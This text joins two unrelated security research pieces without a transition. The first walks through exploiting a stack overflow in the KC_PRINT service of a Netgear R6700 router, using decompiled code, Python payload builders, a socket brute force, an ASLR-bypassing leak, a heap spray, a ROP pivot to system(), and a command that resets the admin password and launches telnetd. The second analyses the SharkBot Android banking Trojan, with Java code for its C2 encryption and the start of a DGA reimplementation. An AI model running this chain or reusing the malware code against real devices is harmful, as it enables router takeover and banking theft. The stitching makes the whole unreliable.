  char is_job_state_reasons; // [sp+1095h] [bp-1Fh]
  char is_job_state; // [sp+1096h] [bp-1Eh]
  char is_job_originating_user_name; // [sp+1097h] [bp-1Dh]
  char is_job_name; // [sp+1098h] [bp-1Ch]
  char is_job_id; // [sp+1099h] [bp-1Bh]
  char suffix_copy1_done; // [sp+109Ah] [bp-1Ah]
  char flag2; // [sp+109Bh] [bp-19h]
  size_t final_size; // [sp+109Ch] [bp-18h]
  int offset; // [sp+10A0h] [bp-14h]
  size_t response_len; // [sp+10A4h] [bp-10h]
  char *final_ptr; // [sp+10A8h] [bp-Ch]
  size_t suffix_offset; // [sp+10ACh] [bp-8h]

  kc_client_1 = kc_client;
  client_sock = kc_client->client_sock;
  usblp_index = kc_client->usblp_index;
  suffix_offset = 0;                            // offset in the suffix_data[] stack buffer
  in_offset = 0;
  final_ptr = 0;
  response_len = 0;
  offset = 0;                                   // offset in the client data "recv_buf" array
  final_size = 0;
  flag2 = 0;
  suffix_copy1_done = 0;
  is_job_id = 0;
  is_job_name = 0;
  is_job_originating_user_name = 0;
  is_job_state = 0;
  is_job_state_reasons = 0;
  is_job_media_sheets_completed = 0;
  bReadAllJobs = 0;

  // prefix_data is a heap allocated buffer to copy some bytes
  // from the client input but is not super useful from an
  // exploitation point of view
  prefix_size = 74;                             // size of prefix_ptr[] heap buffer
  prefix_ptr = (char *)malloc(74u);
  if ( !prefix_ptr )
  {
    perror("Response_Get_Jobs: malloc xx");
    return 0xFFFFFFFF;
  }
  memset(prefix_ptr, 0, prefix_size);

  // copy bytes indexes 0 and 1 from client data
  copied_len = memcpy_at_index(prefix_ptr, in_offset, &recv_buf[offset], 2u);
  in_offset += copied_len;

  // we make sure to avoid this condition to be validated
  // so we keep bReadAllJobs == 0
  if ( *recv_buf == 1 && !recv_buf[1] )
    bReadAllJobs = 1;
  offset += 2;

  // set prefix_data's bytes index 2 and 3 to 0x00
  prefix_ptr[in_offset++] = 0;
  prefix_ptr[in_offset++] = 0;
  offset += 2;

  // copy bytes indexes 4,5,6,7 from client data
  in_offset += memcpy_at_index(prefix_ptr, in_offset, &recv_buf[offset], 4u);
  offset += 4;
  copy_len_1 = 0x42;

  // copy bytes indexes [8,74] from table keywords
  copied_len = memcpy_at_index(prefix_ptr, in_offset, &table_keywords, 0x42u);
  in_offset += copied_len;
  ++offset;                                     // offset = 9 after this

  // job_data[] and suffix_data[] are 2 stack buffers to copy some bytes
  // from the client input but are not super useful from an
  // exploitation point of view
  memset(job_data, 0, sizeof(job_data));
  memset(suffix_data, 0, sizeof(suffix_data));
  suffix_data[suffix_offset++] = 5;

  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration
    while ( recv_buf[offset] != 3 && offset <= content_len )
    {
      // we make sure to enter this as we need flag2 != 0 later
      // to trigger the stack overflow
      if ( recv_buf[offset] == 0x44 && !flag2 )
      {
        flag2 = 1;
        suffix_data[suffix_offset++] = 0x44;

        // we can set a copy_len == 0 to simplify this
        // offset = 9 here
        copy_len = (recv_buf[offset + 1] << 8) + recv_buf[offset + 2];
        copied_len = memcpy_at_index(suffix_data, suffix_offset, &recv_buf[offset + 1], copy_len + 2);
        suffix_offset += copied_len;
      }
      ++offset;                                 // iteration 1: offset = 10 after this


      // this is the same copy_len as above but just used to skip bytes here
      // offset = 10 here
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2 + copy_len;                   // we can set a copy_len == 0 to simplify this
                                                // iteration 1: offset = 12 after this

      // again, copy_len is pulled from client controlled data,
      // this time used in a copy onto a stack buffer
      // copy_len equals maximum: 0xff00 + 0xff = 0xffff
      // and the copy is made into command[] which is only a 64-byte buffer
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2;                              // iteration 1: offset = 14 after this

      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /!\ VULNERABILITY HERE /!\
        memset(command, 0, sizeof(command));
        memcpy(command, &recv_buf[offset], copy_len);// VULN: stack overflow here
        ...

It first starts by allocating a prefix_ptr heap buffer to hold a few bytes of client data. Depending on client data bytes 0 and 1, it may set bReadAllJobs = 1, which we want to avoid in order to reach the vulnerable memcpy(), so we craft our data such that bReadAllJobs remains 0.

Above we also see two memset() calls for the two stack buffers that we named job_data and suffix_data. We then enter the if ( !bReadAllJobs ) branch, and craft the client data to satisfy the while ( recv_buf[offset] != 3 && offset <= content_len ) condition so we enter the loop.

We also need to set flag2 = 1, so we craft the client data to satisfy the if ( recv_buf[offset] == 0x44 && !flag2 ) condition.

Later inside the while loop, if flag2 is set, a 16-bit size (maximum 0xffff = 65535 bytes) is read from the client data in copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];. This size is then used as the length argument when copying into a 64-byte stack buffer in memcpy(command, &recv_buf[offset], copy_len). This is a stack-based overflow where we control both the overflowing size and content. There is no limitation on the byte values we can use for the overflow, which makes it a very nice vulnerability to exploit at first sight.

Since there is no stack cookie, the strategy to exploit this stack overflow is to overwrite the saved return address on the stack and continue execution until the end of the function to get $pc control.
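
To make the trigger conditions concrete, the following is a minimal sketch (in Python) of a request that reaches the vulnerable memcpy(). The byte offsets follow the decompiled code above; the helper name and exact header layout are ours, not taken from the original exploit:

import struct

# Minimal sketch: craft an IPP-like request reaching the vulnerable
# memcpy() in Response_Get_Jobs(). A printer must be connected for
# is_printer_connected() to pass.
def build_get_jobs_request(overflow_data):
    body = b"\x01\x01"           # bytes 0-1: != (0x01, 0x00) so bReadAllJobs stays 0
    body += b"\x00\x0a"          # bytes 2-3: [3] == 0x0a selects Response_Get_Jobs()
    body += b"\x00\x00\x00\x00"  # bytes 4-7: copied into prefix_ptr, values irrelevant
    body += b"\x00"              # byte 8: skipped, the loop starts at offset 9
    body += b"\x44"              # byte 9: 0x44 sets flag2 = 1
    body += b"\x00\x00"          # bytes 10-11: copy_len = 0 for the suffix_data copy
    body += struct.pack(">H", len(overflow_data))  # bytes 12-13: overflowing copy_len
    body += overflow_data        # bytes 14+: copied into the 64-byte command[] buffer
    headers = b"POST /USB0_LQ HTTP/1.1\r\nContent-Length: %d\r\n\r\n" % len(body)
    return headers + body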

Reaching the end of the function

It is now important to look at the stack layout starting from the command[] array we are overflowing. As can be seen below, command[] is the local variable that is furthest away from the return address. This has the advantage of allowing us to control all of the local variables’ values post-overflow. Remember that we are still inside the while loop at this point, so the initial idea is to get out of this loop as soon as possible. By overwriting the local variables with appropriate values, this should be easy.

-00001090 command         DCB 64 dup(?)
-00001050 suffix_data     DCB 2048 dup(?)
-00000850 job_data        DCB 2048 dup(?)
-00000050 error           DCD ?
-0000004C copy_len        DCD ?
-00000048 copy_len_1      DCD ?
-00000044 copied_len      DCD ?
-00000040 prefix_size     DCD ?
-0000003C in_offset       DCD ?
-00000038 prefix_ptr      DCD ?                   ; offset
-00000034 usblp_index     DCD ?
-00000030 client_sock     DCD ?
-0000002C kc_client_1     DCD ?
-00000028 offset_job      DCD ?
-00000024                 DCB ? ; undefined
-00000023                 DCB ? ; undefined
-00000022                 DCB ? ; undefined
-00000021 bReadAllJobs    DCB ?
-00000020 is_job_media_sheets_completed DCB ?
-0000001F is_job_state_reasons DCB ?
-0000001E is_job_state    DCB ?
-0000001D is_job_originating_user_name DCB ?
-0000001C is_job_name     DCB ?
-0000001B is_job_id       DCB ?
-0000001A suffix_copy1_done DCB ?
-00000019 flag2           DCB ?
-00000018 final_size      DCD ?
-00000014 offset          DCD ?
-00000010 response_len    DCD ?
-0000000C final_ptr       DCD ?                   ; offset
-00000008 suffix_offset   DCD ?

So after our overflowing memcpy(), we set the client data to hold the "job-id" command to simplify the code paths taken. Then we see the offset += copy_len statement. Since we control both the copy_len and offset values thanks to our overflow, we can craft values that make us exit the loop condition while ( recv_buf[offset] != 3 && offset <= content_len ), for instance by setting offset = content_len+1.

Next, the second read_job_value() call executes because bReadAllJobs == 0. The read_job_value() function is otherwise not relevant for us; its purpose is to loop over all the printer’s jobs and save the requested data (in our case, the job-id). We assume there are no print jobs at the moment, so nothing will be read. This means the returned offset_job is 0.

  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration
    while ( recv_buf[offset] != 3 && offset <= content_len )
    {
      ...
      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /!\ VULNERABILITY HERE /!\
        memset(command, 0, sizeof(command));
        memcpy(command, &recv_buf[offset], copy_len);// VULN: stack overflow here

        // dispatch to right command 
        if ( !strcmp(command, "job-media-sheets-completed") )
        {
          is_job_media_sheets_completed = 1;
        }
        ...
        else if ( !strcmp(command, "job-id") )
        {
          // atm we make sure to send a "job-id\0" command to go here
          is_job_id = 1;
        }
        else
        {
          ...
        }
      }
      offset += copy_len;                       // this is executed before looping
    }
  }                                             // end of while loop

  final_size += prefix_size;
  if ( bReadAllJobs )
    offset_job = read_job_value(usblp_index, 1, 1, 1, 1, 1, 1, job_data);
  else
    offset_job = read_job_value(
                   usblp_index,
                   is_job_id,
                   is_job_name,
                   is_job_originating_user_name,
                   is_job_state,
                   is_job_state_reasons,
                   is_job_media_sheets_completed,
                   job_data);

Now we continue looking at the vulnerable function code below. Since offset_job == 0, the first if clause is skipped (note: only skipped for now, as it contains a label that we will jump to later, which is why we kept it in the code below).

Then, a heap buffer to hold a response is allocated and saved in final_ptr, and data is copied into it from the prefix_ptr buffer mentioned at the beginning of the vulnerable function. Finally, execution jumps to the b_write_ipp_response2 label where write_ipp_response() at 0x13210 is called. write_ipp_response() won’t be shown for brevity, but its purpose is to send an HTTP response to the client socket.

Finally, the two heap buffers pointed to by prefix_ptr and final_ptr are freed and the function returns.

  // offset_job is an offset inside job_data[] stack buffer
  // atm we assume offset_job == 0 so we skip this condition.
  // Note we assume that due to no printing job currently existing
  // but it would be better to actually make sure all the is_xxx variables == 0 as explained above
  if ( offset_job > 0 )                         // assumed skipped for now
  {
    ...
b_write_ipp_response2:
    final_ptr[response_len++] = 3;
    // the "client_sock" is a local variable that we overwrite
    // when trying to reach the stack address. We need to brute
    // force the socket value in order to effectively send
    // us our leaked data if we really want that data back but
    // otherwise the send() will silently fail
    error = write_ipp_response(client_sock, final_ptr, response_len);

    // From testing, it is safe to use the starting .got address for
    // prefix_ptr: free() will simply ignore that address
    // XXX - not sure why, but if we use memset_ptr (an offset inside
    //       the .got), it crashes on free()
    if ( prefix_ptr )
    {
      free(prefix_ptr);
      prefix_ptr = 0;
    }

    // Freeing the final_ptr is no problem for us
    if ( final_ptr )
    {
      free(final_ptr);
      final_ptr = 0;
    }

    // this is where we get $pc control
    if ( error )
      return 0xFFFFFFFF;
    else
      return 0;
  }

  // we reach here if no job data
  final_ptr = (char *)malloc(++final_size);
  if ( final_ptr )
  {
    // prefix_ptr is a heap buffer that was allocated at the
    // beginning of this function, but the pointer is stored in a
    // stack variable. We have to corrupt this pointer as part of
    // the stack overflow to reach the return address, which means
    // we can make it copy any size from any address, giving us
    // our leak primitive
    memset(final_ptr, 0, final_size);
    copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
    response_len += copied_len;
    goto b_write_ipp_response2;
  }

  // error below / never reached
  ...
}

Exploitation

Mitigations in place

Our goal is to overwrite the return address to get $pc control but there are a few challenges here. We need to know what static addresses we can use.

Checking the ASLR settings of the kernel:

# cat /proc/sys/kernel/randomize_va_space
1

From here:

  • 0 – Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
  • 1 – Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
  • 2 – Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.

Checking the mitigations of the KC_PRINT binary using checksec.py:

[*] '/home/cedric/test/firmware/netgear_r6700/_R6700v3-
V1.0.4.118_10.0.90.zip.extracted/
_R6700v3-V1.0.4.118_10.0.90.chk.extracted/squashfs-root/usr/bin/KC_PRINT'
    Arch:     arm-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8000)

So to summarize:

  • KC_PRINT: not randomized
    • .text: read/execute
    • .data: read/write
  • Libraries: randomized
  • Heap: not randomized
  • Stack: randomized

Building a leak primitive

If we go back to the previous decompiled code we discussed, there are a few things to point out:

final_ptr = (char *)malloc(++final_size);
copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
error = write_ipp_response(client_sock, final_ptr, response_len);

The first one is that in order to overwrite the return address we first need to overwrite prefix_ptr, prefix_size and client_sock.

prefix_ptr needs to be a valid address and this address will be used to copy prefix_size bytes from it into final_ptr. Then that data will be sent back to the client socket assuming client_sock is a valid socket.

This looks like a good leak primitive since we control both prefix_ptr and prefix_size, however we still need to know our previously valid client_sock to get the data back.

However, what if we overwrite the whole stack frame containing all the local variables, but stop short of the saved registers and the return address? The function will then proceed to send us data back and exit as if no overflow had happened. This is perfect, as it allows us to brute force the client_sock value.

Moreover, by testing multiple times, we noticed that if we are the only client connecting to KC_PRINT, the client_sock value can differ between KC_PRINT executions. However, once KC_PRINT has started, it keeps allocating the same client_sock for every connection, as long as we close the previous connection first.

This is a perfect scenario for us, since it means we can initially brute force the socket value by overflowing the entire stack frame (except the saved registers and return address) until we get an HTTP response, and KC_PRINT never crashes. Once we know the socket value, we can start leaking data. But where should we point prefix_ptr?
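
Before answering that question, here is a sketch of what the socket brute force could look like. craft_locals() is a hypothetical helper that lays out the fake local variables (client_sock, prefix_ptr, prefix_size, offset, ...) at the offsets given by the stack layout shown earlier, filling everything from command[] up to, but not including, the saved R11:

import socket

def bruteforce_client_sock(host, got_addr, max_fd=128):
    # got_addr: any readable static address, e.g. inside KC_PRINT's .got
    for fd in range(4, max_fd):
        payload = craft_locals(client_sock=fd, prefix_ptr=got_addr, prefix_size=4)
        s = socket.create_connection((host, 631))
        s.settimeout(5)
        s.sendall(build_get_jobs_request(payload))
        try:
            data = s.recv(4096)  # an IPP response means the fd guess was right
        except socket.timeout:
            data = b""
        s.close()
        if data:
            return fd
    return None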

Bypassing ASLR and achieving command execution

Here, there is another challenge to solve. Indeed, at the end of Response_Get_Jobs there is a call to free(prefix_ptr); before we can control $pc. So initially we thought we would need a heap address that is valid to pass to free().

However, after testing in the debugger, we noticed that passing the Global Offset Table (GOT) address to the free() call went through without crashing. We are not sure why, as we did not investigate due to time constraints; however, this opens new opportunities. Indeed, the .got is at a static address because KC_PRINT is compiled without PIE support. This means we can leak the address of an imported function like memset(), which lives in libc.so. From that we can deduce the libc.so base address, effectively bypassing the ASLR in place for libraries, and then deduce the system() address.
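
Concretely, the leak can be turned into a system() address along the following lines. Every numeric value here is an illustrative placeholder; the real ones come from the target binaries (e.g. via readelf on KC_PRINT and libc.so.0):

MEMSET_GOT_ENTRY = 0x18E40  # hypothetical: memset() slot in KC_PRINT's .got (no PIE)
MEMSET_LIBC_OFF = 0x3A2B0   # hypothetical: offset of memset() inside libc.so.0
SYSTEM_LIBC_OFF = 0x58D4C   # hypothetical: offset of system() inside libc.so.0

def resolve_system(leak):
    # leak(addr, size) is the primitive built above: prefix_ptr = addr,
    # prefix_size = size, using the brute-forced client_sock
    memset_addr = int.from_bytes(leak(MEMSET_GOT_ENTRY, 4), "little")
    libc_base = memset_addr - MEMSET_LIBC_OFF
    return libc_base + SYSTEM_LIBC_OFF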

Our end goal is to call system() on an arbitrary string to execute a shell command. But where do we store that string? Initially we thought we could place it on the stack, but the stack is randomized, so we can’t hardcode its address in our data. We could use a complicated ROP chain to build the command string, but that seemed over-complicated on ARM (32-bit) due to the 4-byte instruction alignment, which makes using non-aligned instructions impossible. We also considered switching from ARM mode to Thumb mode. But is there an even easier method?

What if we could allocate controlled data at a specific address? Then we remembered the excellent blog from Project Zero which mentioned mmap() randomization was broken on 32-bit. And in our case, we know the heap is not randomized, so what about big allocations? It turns out they are randomized but not so well.

Remember we mentioned earlier in this blog post that we can send an HTTP content body as big as we want, and that a heap buffer of that size will be allocated? Now we have a use for it. By sending an HTTP content of e.g. 0x1000000 bytes (16MB), we noticed it gets allocated outside of the [heap] region and above the libraries. More specifically, we noticed through testing that an address in the range 0x401xxxxx-0x403xxxxx is always used.

# cat /proc/317/maps
00008000-00018000 r-xp 00000000 1f:03 1429       /usr/bin/KC_PRINT          // static
00018000-00019000 rw-p 00010000 1f:03 1429       /usr/bin/KC_PRINT          // static
00019000-0001c000 rw-p 00000000 00:00 0          [heap]                     // static
4001e000-40023000 r-xp 00000000 1f:03 376        /lib/ld-uClibc.so.0        // ASLR
4002a000-4002b000 r--p 00004000 1f:03 376        /lib/ld-uClibc.so.0
4002b000-4002c000 rw-p 00005000 1f:03 376        /lib/ld-uClibc.so.0
4002f000-40030000 rw-p 00000000 00:00 0
40154000-4015f000 r-xp 00000000 1f:03 265        /lib/libpthread.so.0       // ASLR
4015f000-40166000 ---p 00000000 00:00 0
40166000-40167000 r--p 0000a000 1f:03 265        /lib/libpthread.so.0
40167000-4016c000 rw-p 0000b000 1f:03 265        /lib/libpthread.so.0
4016c000-4016e000 rw-p 00000000 00:00 0
4016e000-401d3000 r-xp 00000000 1f:03 352        /lib/libc.so.0             // ASLR
401d3000-401db000 ---p 00000000 00:00 0
401db000-401dc000 r--p 00065000 1f:03 352        /lib/libc.so.0
401dc000-401dd000 rw-p 00066000 1f:03 352        /lib/libc.so.0
401dd000-401e2000 rw-p 00000000 00:00 0                                     // Broken ASLR
bcdfd000-bce00000 rwxp 00000000 00:00 0
bcffd000-bd000000 rwxp 00000000 00:00 0
bd1fd000-bd200000 rwxp 00000000 00:00 0
bd3fd000-bd400000 rwxp 00000000 00:00 0
bd5fd000-bd600000 rwxp 00000000 00:00 0
bd7fd000-bd800000 rwxp 00000000 00:00 0
bd9fd000-bda00000 rwxp 00000000 00:00 0
bdbfd000-bdc00000 rwxp 00000000 00:00 0
bddfd000-bde00000 rwxp 00000000 00:00 0
bdffd000-be000000 rwxp 00000000 00:00 0
be1fd000-be200000 rwxp 00000000 00:00 0
be3fd000-be400000 rwxp 00000000 00:00 0
beacc000-beaed000 rw-p 00000000 00:00 0          [stack]                    // ASLR

If it gets allocated at the lowest address, 0x40100008, it will end at 0x41100008. This means we can spray pages of the same data and get deterministic content at a static address, e.g. 0x41000100.
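
As an illustration, the spray could look like the sketch below. Keeping the 16MB buffer alive by withholding the final byte (so toRead() blocks) is our assumption, not necessarily the original exploit's approach, and for clarity the sketch ignores the small shift introduced by the malloc chunk header:

import socket

def spray(host, page, size=0x1000000):
    # page: 0x1000 bytes of controlled content, repeated across the buffer,
    # so a static address like 0x41000100 predictably holds our data
    assert len(page) == 0x1000
    body = bytes(page) * (size // 0x1000)
    headers = b"POST /USB0_LQ HTTP/1.1\r\nContent-Length: %d\r\n\r\n" % len(body)
    s = socket.create_connection((host, 631))
    s.sendall(headers + body[:-1])  # withhold 1 byte: toRead() blocks and the
    return s                        # 16MB heap buffer stays allocated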

Finally, looking at the Response_Get_Jobs function’s epilogue, we see POP {R11,PC} which means we can craft a fake R11 and use a gadget like the following to pivot our stack to a new stack where we have data we control to start doing Return Oriented Programming (ROP):

.text:000118A0                 LDR             R3, [R11,#-0x28]
.text:000118A4
.text:000118A4 loc_118A4                               ; Get_JobNode_Print_Job+7D8↑j
.text:000118A4                 MOV             R0, R3
.text:000118A8                 SUB             SP, R11, #4
.text:000118AC                 POP             {R11,PC}

So we can make R11 point to our static region at 0x41000100 and also store the command to execute at a static address in that region. We then use the above gadget to load the address of that command (also stored in that region) into r0, the first argument of system(), and pivot the stack into that region so that the function finally returns into system("any command").
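
Putting it together, the sprayed page can embed both the fake frame and the command string. The gadget address is the static one shown above; the in-page offsets and addresses are illustrative and assume the fake frame lands at 0x41000100:

import struct

GADGET_ADDR = 0x118A0    # LDR R3,[R11,#-0x28] ... POP {R11,PC} (static: no PIE)
FAKE_R11 = 0x41000100    # hypothetical landing address inside the sprayed region
CMD_ADDR = 0x41000200    # hypothetical address of the command string in the spray
CMD = b"any command\x00" # the shell command to run (see the next section)

def build_fake_frame(page, system_addr):
    # page: a bytearray of 0x1000 bytes passed to spray() above
    page[0x100-0x28:0x100-0x24] = struct.pack("<I", CMD_ADDR)  # -> r3 -> r0
    page[0x100-4:0x100] = struct.pack("<I", 0x41414141)        # next R11, unused
    page[0x100:0x104] = struct.pack("<I", system_addr)         # popped into pc
    page[0x200:0x200+len(CMD)] = CMD
    return page

# The overflow then sets the saved R11 to FAKE_R11 and the saved return
# address to GADGET_ADDR, so the epilogue pivots into system(CMD).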

Obtaining a root shell

We decided to use the following command: "nvram set http_passwd=nccgroup && sleep 4 && utelnetd -d -i br0". This is very similar to the method used in the Tokyo Drift paper, except that in our case we have more control: since we can execute any commands we want, we can set an arbitrary password as well as start the utelnetd process, instead of just being able to reset the HTTP password to its default value.

Finally, we use the same trick as the Tokyo Drift paper and log in to the web interface to re-set the password to the same value, so that utelnetd takes our new password into account and we get a remote shell on the Netgear router.

✇NCC Group Research

SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store

By: RIFT: Research and Intelligence Fusion Team

Authors:

  • Alberto Segura, Malware analyst
  • Rolf Govers, Malware analyst & Forensic IT Expert

NCC Group, as well as many other researchers, noticed a rise in Android malware last year, especially Android banking malware. Within the Threat Intelligence team of NCC Group we look closely at several of these malware families to provide valuable information to our customers about these threats. Next to the more popular Android banking malware families, NCC Group’s Threat Intelligence team also watches new trends and new families that arise and could be potential threats to our customers.

One of these ‘newer’ families is an Android banking malware called SharkBot. During our research we noticed that this malware was distributed via the official Google Play Store. After discovery we immediately notified Google and decided to share our knowledge via this blog post.

NCC Group’s Threat Intelligence team continues to analyse SharkBot and uncover new findings. Shortly after we published this blog post, we found several more SharkBot droppers in the Google Play Store. All appear to behave identically; in fact, the code seems to be a literal ‘copy-paste’ in all of them, and the same C2 server is used in all the other droppers. After discovery we immediately reported this to Google. See the IoCs section below for the Google Play Store URLs of the newly discovered SharkBot dropper apps.

Summary

SharkBot is an Android banking malware found at the end of October 2021 by the Cleafy Threat Intelligence Team. At the time of writing, the SharkBot malware doesn’t seem to have any relation to other Android banking malware families like Flubot, Cerberus/Alien, Anatsa/Teabot, Oscorp, etc.

The Cleafy blog post stated that the main goal of SharkBot is to initiate money transfers (from compromised devices) via Automatic Transfer Systems (ATS). As far as we have observed, this is an advanced attack technique which isn’t used regularly within Android malware. It enables adversaries to auto-fill fields in legitimate mobile banking apps and initiate money transfers, where other Android banking malware, like Anatsa/Teabot or Oscorp, requires a live operator to insert and authorize money transfers. This technique also allows adversaries to scale up their operations with minimal effort.

The ATS features allow the malware to receive a list of events to simulate, which are then replayed in order to perform the money transfers. Since this feature can be used to simulate touches/clicks and button presses, it can be used not only to automatically transfer money but also to install other malicious applications or components. This is the case for the SharkBot version that we found in the Google Play Store, which seems to be a reduced version of SharkBot with the minimum required features, such as ATS, used to install a full version of the malware some time after the initial install.

Because it is distributed via the Google Play Store as a fake antivirus, SharkBot has to make use of infected devices in order to spread the malicious app. SharkBot achieves this by abusing the ‘Direct Reply’ Android feature, which is used to automatically reply to incoming notifications with a message to download the fake antivirus app. This spreading strategy abusing the Direct Reply feature was seen recently in another banking malware called Flubot, discovered by ThreatFabric.

What is interesting and different from the other families is that SharkBot likely uses ATS to also bypass multi-factor authentication mechanisms, including behavioural detection like biometrics, while at the same time it also includes more classic features to steal users’ credentials.

Money and Credential Stealing features

SharkBot implements the four main strategies to steal banking credentials in Android:

  • Injections (overlay attack): SharkBot can steal credentials by showing a WebView with a fake login website (phishing) as soon as it detects that the official banking app has been opened.
  • Keylogging: Sharkbot can steal credentials by logging accessibility events (related to text fields changes and buttons clicked) and sending these logs to the command and control server (C2).
  • SMS intercept: Sharkbot has the ability to intercept/hide SMS messages.
  • Remote control/ATS: Sharkbot has the ability to obtain full remote control of an Android device (via Accessibility Services).

For most of these features, SharkBot needs the victim to enable the Accessibility Permissions & Services. These permissions allow Android banking malware to intercept all the accessibility events produced by the user’s interaction with the user interface, including button presses, touches and TextField changes (useful for the keylogging features). The intercepted accessibility events also allow the malware to detect the foreground application, so banking malware also uses these permissions to detect when a targeted app is open, in order to show the web injections that steal the user’s credentials.

Delivery

SharkBot is distributed via the Google Play Store, but also using something relatively new in Android malware: the ‘Direct Reply’ feature for notifications. With this feature, the C2 can provide a message to the malware, which is then used to automatically reply to incoming notifications received on the infected device. This was recently introduced by Flubot to distribute the malware using infected devices, but it seems SharkBot threat actors have also included this feature in recent versions.

In the following image we can see the SharkBot code used to intercept new notifications and automatically reply to them with the message received from the C2.

In the following picture we can see the ‘autoReply’ command received by our infected test device, which contains a shortened Bit.ly link redirecting to the Google Play Store sample.

We detected the reduced SharkBot version published in Google Play on 28th February, but its last update was on 10th February, so the app has been available for some time. This reduced version uses a very similar protocol to communicate with the C2 (RC4 to encrypt the payload and a public RSA key to encrypt the RC4 key, so the C2 server can decrypt the request and encrypt the response using the same key). This SharkBot version, which we can call SharkBotDropper, is mainly used to download a fully featured SharkBot from the C2 server, which is then installed by using the Automatic Transfer System (ATS) (simulating clicks and touches with the Accessibility permissions).

This malicious dropper is published in the Google Play Store as a fake Antivirus, which really has two main goals (and commands to receive from C2):

  • Spread the malware using the ‘Auto reply’ feature: it can receive an ‘autoReply’ command with the message that should be used to automatically reply to any notification received on the infected device. During our research, it has been spreading the same Google Play dropper via a shortened Bit.ly URL.
  • Dropper+ATS: The ATS features are used to install the downloaded SharkBot sample obtained from the C2. In the following image we can see the decrypted response received from the C2, in which the dropper receives the command ‘b‘ to download the full SharkBot sample from the provided URL and the ATS events to simulate in order to get the malware installed.

With this command, the app installed from the Google Play Store is able to install the fully featured SharkBot sample it downloaded and enable its Accessibility Permissions. That sample is then used to perform the ATS fraud to steal money and credentials from the victims.

The fake Antivirus app, the SharkBotDropper, published in the Google Play Store has more than 1,000 downloads and some fake comments like ‘It works good’, but also other comments from victims who realized that this app does some weird things.

Technical analysis

Protocol & C2

The protocol used to communicate with the C2 servers is HTTP based. The HTTP requests are made in plaintext, since it does not use HTTPS. Even so, the actual payload with the information sent and received is encrypted using RC4. The RC4 key used to encrypt the information is randomly generated for each request and encrypted using the RSA public key hardcoded in each sample. That way, the C2 can decrypt the encrypted key (the ‘rkey’ field in the HTTP POST request) and finally decrypt the sent payload (the ‘rdata’ field in the HTTP POST request).
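The following is a minimal Java sketch of the client side of this scheme, using standard JCE primitives. Only the rkey/rdata layout comes from the observed traffic; the 16-byte key length, the PKCS1 padding choice and the class/method names are assumptions:

import java.security.KeyFactory;
import java.security.PublicKey;
import java.security.SecureRandom;
import java.security.spec.X509EncodedKeySpec;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

public class C2Crypto {
    // Returns { rkey, rdata } ready to be placed in the HTTP POST body
    public static String[] encryptRequest(String jsonPayload, String rsaPubKeyB64)
            throws Exception {
        // Fresh RC4 key for every request (the key length is an assumption)
        byte[] rc4Key = new byte[16];
        new SecureRandom().nextBytes(rc4Key);

        // rdata: the JSON payload encrypted with RC4 (JCE standard name: ARCFOUR)
        Cipher rc4 = Cipher.getInstance("ARCFOUR");
        rc4.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(rc4Key, "ARCFOUR"));
        byte[] rdata = rc4.doFinal(jsonPayload.getBytes("UTF-8"));

        // rkey: the RC4 key encrypted with the hardcoded RSA public key,
        // so only the C2 (holding the private key) can recover it
        PublicKey pub = KeyFactory.getInstance("RSA").generatePublic(
                new X509EncodedKeySpec(Base64.getDecoder().decode(rsaPubKeyB64)));
        Cipher rsa = Cipher.getInstance("RSA/ECB/PKCS1Padding");
        rsa.init(Cipher.ENCRYPT_MODE, pub);
        byte[] rkey = rsa.doFinal(rc4Key);

        return new String[] {
            Base64.getEncoder().encodeToString(rkey),
            Base64.getEncoder().encodeToString(rdata)
        };
    }
}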

If we take a look at the decrypted payload, we can see how SharkBot is simply using JSON to send different information about the infected device and receive the commands to be executed from the C2. In the following image we can see the decrypted RC4 payload which has been sent from an infected device.

Two important fields sent in the requests are:

  • ownerID
  • botnetID

Those parameters are hardcoded and have the same value in the analyzed samples. We think those values could be used in the future to identify different buyers of this malware, which, based on our investigation, is not yet being sold on underground forums.

Domain Generation Algorithm

SharkBot includes one or two hardcoded domains/URLs which should be registered and working, but in case the hardcoded C2 servers are taken down, it also includes a Domain Generation Algorithm (DGA) so that it can communicate with a new C2 server in the future.

The DGA uses the current date and a specific suffix string (‘pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf’), encodes the result in base64 and takes the first 19 characters. Then, it appends different TLDs to generate the final candidate domains.

The date elements used are:

  • Week of the year (v1.get(3) in the code)
  • Year (v1.get(1) in the code)

It uses the ‘+’ operator, but since the week of the year and the year are Integers, they are added instead of concatenated, so for example: for the second week of 2022, the generated string to be base64 encoded is: 2 + 2022 + “pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf” = 2024 + “pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf” = “2024pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf”.
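Putting the pieces together, a minimal Java reimplementation of the algorithm could look as follows. The suffix and the Calendar field indices (1 = YEAR, 3 = WEEK_OF_YEAR, matching v1.get(1) and v1.get(3) in the decompiled code) come from the sample; the TLD list and the lowercasing/normalization step are assumptions for illustration:

import java.util.ArrayList;
import java.util.Base64;
import java.util.Calendar;
import java.util.List;
import java.util.Locale;

public class SharkBotDga {
    // Hardcoded suffix observed in the sample
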